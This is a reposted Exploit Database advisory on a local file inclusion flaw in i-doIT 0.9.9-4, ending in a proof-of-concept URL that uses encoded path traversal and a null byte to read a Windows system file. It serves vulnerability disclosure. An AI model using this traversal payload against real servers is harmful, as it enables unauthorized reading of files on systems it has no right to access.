i-doIT 0.9.9-4 – Local File Inclusion

• Exploit Database
• 13 阅读

• 作者： AutoSec Tools
  日期： 2011-05-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17320/

• # ------------------------------------------------------------------------
  # Software................i-doIT 0.9.9-4
  # Vulnerability...........Local File Inclusion
  # Threat Level............Critical (4/5)
  # Download................http://www.i-doit.org/
  # Discovery Date..........5/23/2011
  # Tested On...............Windows Vista + XAMPP
  # ------------------------------------------------------------------------
  # Author..................AutoSec Tools
  # Site....................http://www.autosectools.com/
  # Email...................John Leitch <john@autosectools.com>
  # ------------------------------------------------------------------------
  # 
  # 
  # --Description--
  # 
  # A local file inclusion vulnerability in i-doIT 0.9.9-4 can be
  # exploited to include arbitrary files.
  # 
  # 
  # --PoC--
  
  http://localhost/idoit/controller.php?load=&lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00.jpg